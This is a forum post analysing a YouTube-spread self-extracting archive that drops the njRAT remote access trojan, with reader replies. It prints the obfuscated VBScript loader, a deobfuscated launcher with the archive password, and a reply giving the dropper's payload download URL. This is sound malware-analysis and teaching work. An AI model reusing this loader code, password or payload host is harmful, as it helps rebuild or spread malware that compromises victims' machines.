[ANALYSIS | UNPACKING] Firestorm - Self-extracting Archive

malware
rat
reverseengineering
analysis

#1

README

If your antivirus detects this page as malicious, it is most probably because I have pasted some scripts into the article. Do not be alarmed!

Introduction

Very recently I’ve (finally) set up a proper malware analysis VM and so I thought that it would be super fun to download some samples from malware spreaders on YouTube. I came across something interesting from which I have learned and expanded my knowledge and so I thought I’d share my analytical journey with you guys in hopes that you will also learn something!

Author Assigned Level: -

Community Assigned Level:

  • Newbie
  • Wannabe
  • Hacker
  • Wizard
  • Guru

0 voters

Required Skills

Nothing extraordinary, these are entirely optional and is not needed to understand the analysis.

  • Visual Basic
  • C# .NET
  • Reverse engineering
  • Forensics
  • Persistence
  • Common sense :wink:

Analysis

Static Analysis

VirusTotal - Firestorm.exe

With all things hacking, recon should be the first step towards understanding the target. The first thing I do is upload the sample to VirusTotal (VT) to see if this has already been detected or not, or just to try and get a general overview of what I might be dealing with.

Okay, so there are some detections but it seems to be a pretty generic and it doesn’t really help me much.

pestudio - Firestorm.exe

Since VT wasn’t helpful, I needed to get a better understanding of what this file is and what it can do. So, using pestudio, I may be able to get some hints.

We can see here there are quite a few flags being raised, most notably:

  • it attempts to appear as a Microsoft executable IEXPLORE.exe which is Internet Explorer,
  • it seems to have another file within,
  • it references file streams so it may write to disk,
  • it references cryptographic functions which may indicate some sort of obfuscation
  • the debug file name is sfxrar.pdb which indicates a self-extracting archive, most likely WinRAR.

If we go into the manifest, we can see that it tells us that it’s a WinRAR SFX:

File Extraction with WinRAR - Firestorm.exe

Let’s open up this archive in WinRAR and see what it contains:

On the right-hand side, we can see the SFX script which details the path to where these files will extract, file execution after unpacking, silent install and file overwriting. Of course the file execution is what grabs our attention so let’s extract these files and have a look at them.

pestudio - sfx.exe

So the file name of sfx.exe gives us a pretty good clue as to what it might be so let’s confirm with pestudio:

Yes, as we expected. Can we extract it?

Unfortunately not. :frowning: So let’s continue with form1.vbe.

Deobfuscating Visual Basic - form1.vbe

Upon opening the file, this is what we see:

TZUO3TWPSQYCGRU="RewXŠš‚‹–ÞíÖK<m€˜«Š¡®¬ÅÈê7<UX‰œ´Ç¦½ÊÈá.PSXqt¥¸ÐãÂÙæ.GJlotozÇÒºìû.YJ{Ž¦¹˜¯¼ºÓÖBEJcf—ªÂÕ´ËØÖ9<^af‚³ÆÞñÐç><UXz}‚ÄÆÑèÈÃiy€“¦§ÄžÉºÊîA*[hwb“¡´šÍÚÄFS8iw‰p¡®À¨àéMZlT
’¡Œ½ÊàÄ?LbFy†p¦¯šÍÚÄFS8pyb›©Œ½ËÜÄ?L_Fw
”~¯½Ð¶êD*`oT
“¤Œ½ÊÙÄGS8iwŠp¡®½¨ßïUbFw„˜~¯¼Ë¶ïG*[i|b– Œ¿Î¶îE*bkT›~¯½Î¶ç>Q8iw†p¡¯Â¨ÜìT]Fw„–~¯¼Ë¶ç>T8ivŒp£²šÎÙÄ?O8ivbš§Œ½ËÝÄ?L^F~‡p¡®À¨Ùæ?*[h~b“ ¶šÎÞÄFN8iw‹p¡¯¼¨ÛèO^Fw
—~¯¼Ì¶ç@L8l|b“ ¯šËÚæMZiT‡”~±¾¨ÜëM[jTŒ–~·À¨ÝìP]Fw
’~´Á¨àèM[pTŠ›~¯½Ì¶îB*[ibš§ŒÂÓ¶ìG*]mT‡–~ ™¤íĄR<s~S^ÏßæíČÈó.iy€“¦§Ä‹–ãîÖRaJuf—ªÂÕ´ËØÖ9<^af‚³ÆÞñÐç><UXz}‚›žÏâúč6MZXqt–™žàâíĄ.)4
•œ¯ÂÒ¬×Èĉ^hsŒnÁÑØßþÆëþ`sRivt²µÃÈÃax|f¨ž™¤ñü.`oXƒt¥¸ÐãÂÙæ.GJlotÁÔìÿÞ?LJcfˆ‹©¬ÝðĈeD[hf‚¤§¬îðû\<7BºÉ‚­žáÜ÷ċ\`R
•œ¯ÂÒµºÓÖ6<WX‰œ´Ç¦ÀÓÑß.)4~•¦‚½žÉºëþ`sRl~}‚ÄͬĎĝÃ`s
f§¦ž™¤ûú.YJœ¸|¯¿ÆÙìüÞ[ESXS^©¶Ò¬×ÈØu‘¬­ÈÉäåĀĀĔĪužŸ«Æɒ‹–àô÷[eJufš®±ËÕºÓÖa`JEP¢§ÈÒ¬§²úWiJ{‹˜´¶Ð¬§²ûfamš™‚˜ÄØÛõÿ7<7B‰™¦ÂÄÞºåÖQd|n
’©¬ÎÑÖ9<m€˜«Š¡®¬ÅÈê7<UX‰œ´Ç¦½ÊÈá.PSXqt„Ñô¹üġĘoZfalµÌкñü.<7B¬ÉÐÓòõĉĖÖrŽR¦»}‚}ˆÿČÈó._rŠ|Ð姙¤ČĨ.YJ«¸alµÌкîċ\_~•¢‚}ˆ™¤" : PZUO3TWPSQYCGRU="ZUO3TWPSQYCGRU" : CZUO3TWPSQYCGRU=len(PZUO3TWPSQYCGRU) : do until NZUO3TWPSQYCGRU=len(TZUO3TWPSQYCGRU) : NZUO3TWPSQYCGRU=NZUO3TWPSQYCGRU+1 : UZUO3TWPSQYCGRU=UZUO3TWPSQYCGRU+1 : if UZUO3TWPSQYCGRU=len(PZUO3TWPSQYCGRU) then UZUO3TWPSQYCGRU=1
WZUO3TWPSQYCGRU=WZUO3TWPSQYCGRU & ChrW(AscW(Mid(TZUO3TWPSQYCGRU, NZUO3TWPSQYCGRU, 1)) - UZUO3TWPSQYCGRU * CZUO3TWPSQYCGRU) : loop : execute WZUO3TWPSQYCGRU

and what a mess it is. Obfsucation for scripts is a very common thing so it should not come as a surprise. The problem for us is to deobfuscate it somehow. We can see that there is a string which may contain another payload once it has been deobfuscated and some function calls but it’s still very confusing and may take us some time to reverse engineer it, especially for people like me who are not quite familiar with Visual Basic.

What’s a simple way we can continue without too much effort? On the end of the script, we see an execute function on the WZUO3TWPSQYCGRU variable. So let’s be smart here and instead of having execute there we force it to write the contents out to disk! After a quick Google search, it seems we just need to replace it with WScript.Echo, then call the script using cscript.exe (important! otherwise it will pop up a message box!). Here is the output:

(The following script has sections removed to prevent AV detection)

DIM DF
MOHMRET = "83101116328711510483104101108108326132878399114105112116466711410197116101799810610199116403487839911410511211646831041011081083441131087115104831041011081084682117110323411510212-04610112010132324511284945643110658211869112841198769693534"
END IF
mohar = MOHMRET
MOHMRT = SPLIT(mohar,CHRW(10 + 4)) 
END IF
EXECUTE (FLAMI) 
END IF  

Yes, indeed it is another payload. Again, we can see it’s obfuscated but this time, it’s makes a bit more sense. There is another potential payload held in the MOHMRET variable which looks to be ASCII with some kind of character woven in. We can see the split function using mohar (MOHMRET) and a character 10 + 4 which may confirm the assumption.

Instead of deobfuscating this file, we want to be smart so similar to the previous script, let’s replace execute with WScript.Echo and see what we get:

Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "sfx.exe  -pT^8+nARvEpTwWEE#"

There is no more obfuscation and we can see references to sfx.exe. This script seems to be attempting to execute the other file on the command line with what is most likely the password to the archive. With a quick Google search, WinRAR takes the command line option -p as a password parameter and with that, we have unlocked a piece of the puzzle.

Here we have yet another auto-run executable called eze.exe. Let’s extract it and perform some more analysis.

pestudio - eze.exe

Looking at the indicators in pestudio, we can see that it fakes itself in order to look like a Microsoft executable. We can also see that it may be a .NET file and looking at the name WindowsFormsApp1.exe tells us that this project may have taken a default name when it was coded, i.e. a C# Windows Form project.

Moving onto the VT indicators (the sample must already exist on VT), we can see that it may be a dropper:

Let’s take a look at the strings since it might provide us with the file names of the file it may drop:

And quite some interesting strings we have here. Greetings, Mr. Stan! If you are reading this, you are violating rule number 5 of the CIA’s Development Tradecrafts DOs and DON’Ts. Here’s the link, just for you! :wink: Don’t be surprised if cops show up at the front of your door! :astonished:

We can confirm the project development under Visual Studio 2017 as we suspected from the default project name. The string that is listed after looks like it may be the location from where the dropper obtains its payload. If we navigate to the page, we get an error:

So it may seem that the file is not a PNG at all, or any type of image file.

Dynamic Analysis

dnSpy - eze.exe

We would love to see the file that is dropped by this file and of course it can easily be obtained just by downloading the file but just to spice things up, let’s look at how we can get it via dynamic analysis. Open up eze.exe in dnSpy and let’s see what it does.

In the red box, we can see a call to a very common method call Assembly.Load. This function is mostly used to load a malicious file into memory for execution as indicated by the EntryPoint.Invoke method call. For an example of this, see @TheDoctor’s [C#] A Simple Runtime Crypter article.

To get the binary file, we simply place a breakpoint on this line and run it until it gets hit (mind the sleep at the beginning!)…

… look in the variable’s (array) memory (right-click the variable in the Locals tab at the bottom, select Show in Memory Window and then choose a memory view)…

… and there lies the binary we were looking for! Identify the MZ magic and the PE\0\0 signatures to verify. Right-click the memory and select Save Selection....

Let’s see what VT has for us.

55/67 detections! Identified as Bladabindi AKA njRAT.

Conclusions

I hope this was an entertaining and educational read! Thanks for stopping by!

EDIT:
The sample can now be obtained here:

https://www.hybrid-analysis.com/sample/6fed01e33311f0b0d25a894efdfa3412d00f40fbb0c5f0ba303a2c41c4dbd31f?environmentId=100

– dtm


(oaktree) #2

So you found this program somewhere on YouTube?


#3

Let’s make a CTF about how many YouTube keyloggers you can take over


#4

Yep, actually not a bad place to find some wild malwarez.


#5

Could you share the sample possibly?


#6

The sample should be downloadable via Hybrid Analysis. The link is provided at the bottom of the article.


(DamaneDz) #7

Nice analysis

I have just one addition about the image url

http://iupcloud.com/uploads/up669851510864553_ha.png


#8

This topic was automatically closed after 30 days. New replies are no longer allowed.